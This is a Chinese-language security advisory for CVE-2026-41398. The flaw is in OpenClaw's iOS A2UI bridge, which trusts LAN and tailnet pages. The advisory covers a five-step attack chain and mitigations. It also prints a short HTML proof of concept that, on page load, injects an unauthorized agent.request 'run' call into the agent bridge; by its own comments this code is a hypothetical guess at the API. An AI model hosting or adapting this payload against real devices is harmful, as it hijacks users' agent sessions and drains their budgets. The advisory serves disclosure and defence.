CVE-2026-41398 OpenClaw访问控制不当漏洞

漏洞信息

漏洞编号

CVE-2026-41398

漏洞类型

访问控制不当

CVSS评分

4.6 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.2之前的版本中存在一处关键的访问控制不当漏洞。该漏洞位于iOS A2UI网桥组件，由于其错误地将通用局域网及tailnet页面视为受信任来源，导致安全边界失效。攻击者可利用此缺陷，通过诱导用户加载来自本地网络或tailnet的受控页面，注入未经授权的agent.request运行指令，进而造成会话状态污染及预算资源耗尽，对系统可用性和完整性构成威胁。

技术细节

该漏洞的核心技术问题在于OpenClaw的iOS A2UI网桥组件对“受信任来源”的定义过于宽泛。系统未能对请求来源进行严格的身份验证，错误地将通用本地网络（LAN）及Tailnet范围内的页面视为等同于本地可信环境。攻击者利用这一逻辑缺陷，结合邻接网络攻击向量（AV:A），通过在受害者所处的同一局域网或Tailnet网络内部署恶意服务器，诱导受害者用户进行交互（UI:R）。当受害者加载攻击者控制的页面时，该页面即可跨域发起未授权的`agent.request`请求。由于网桥将这些请求视为合法的本地操作，系统会执行相应的逻辑，导致会话状态被恶意篡改或污染，并消耗预定的资源预算。该漏洞虽然需要用户交互，但利用门槛相对较低，且由于发生在邻接网络，对内网安全构成威胁。

攻击链分析

STEP 1

侦察

攻击者确认目标设备处于同一局域网（LAN）或Tailnet网络中，并运行着受影响版本的OpenClaw。

STEP 2

资源准备

攻击者在本地网络中搭建恶意Web服务器，并准备包含恶意脚本的HTML页面，旨在调用A2UI网桥接口。

STEP 3

诱导交互

攻击者诱导受害者用户（通过社会工程学或网络钓鱼）访问其部署的恶意页面链接。

STEP 4

漏洞利用

受害者设备加载页面，iOS A2UI网桥错误地将该页面识别为受信任来源，允许其执行未授权的`agent.request`调用。

STEP 5

影响达成

系统执行恶意请求，导致会话状态被污染，预算资源被消耗，影响完整性和可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
  PoC for CVE-2026-41398
  Description: Host this HTML on a local network (LAN/Tailnet) server.
  When accessed by a victim device running vulnerable OpenClaw, it attempts
  to inject unauthorized agent.request calls via the trusted A2UI bridge.
-->
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>OpenClaw A2UI Bridge Exploit</title>
</head>
<body>
    <h1>CVE-2026-41398 PoC</h1>
    <p>Attempting to inject unauthorized agent.request...</p>
    <script>
        // The exploit relies on the A2UI bridge treating this LAN page as trusted
        document.addEventListener('DOMContentLoaded', () => {
            try {
                // Hypothetical API call structure based on vulnerability description
                // Real implementation depends on OpenClaw's internal A2UI API
                if (window.webkit && window.webkit.messageHandlers && window.webkit.messageHandlers.openclaw_a2ui) {
                    const payload = {
                        action: 'agent.request',
                        params: {
                            command: 'run',
                            data: 'unauthorized_payload'
                        }
                    };
                    // Injecting the request
                    window.webkit.messageHandlers.openclaw_a2ui.postMessage(payload);
                    console.log('[+] Payload sent via A2UI bridge');
                } else {
                    console.log('[-] A2UI bridge handler not found');
                }
            } catch (e) {
                console.error('[-] Exploit failed:', e);
            }
        });
    </script>
</body>
</html>

影响范围

OpenClaw < 2026.4.2

防御指南

临时缓解措施

在未升级修复版本前，建议用户避免访问不可信的本地网络（LAN）或Tailnet页面。管理员应监控OpenClaw的会话状态和预算消耗情况，一旦发现异常激增，应立即排查网络流量来源。此外，可以通过防火墙规则限制iOS设备对非必要内网服务的访问。